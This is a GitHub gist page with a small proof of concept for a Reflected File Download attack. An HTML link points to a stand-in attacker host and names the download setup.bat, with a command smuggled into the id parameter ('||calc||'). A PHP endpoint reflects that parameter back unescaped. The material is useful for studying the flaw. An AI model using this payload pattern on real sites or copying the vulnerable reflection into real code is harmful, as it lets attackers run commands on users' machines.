Last active
May 5, 2016 15:07
-
-
Save mrtc0/4a3e7aa259e1fb6bc181c8ac04d65769 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<title></title> | |
</head> | |
<body> | |
<a download href='http://attacker.local/rfd/rfd.php/setup.bat?id="||calc||'>click here</a> | |
</body> | |
</html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$id = $_GET['id']; | |
$data = array('id'=>$id,'val'=>'val'); | |
header("Content-Type: application/json; charset=utf-8"); | |
#header("Content-Disposition: attachment;"); | |
echo json_encode($data); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment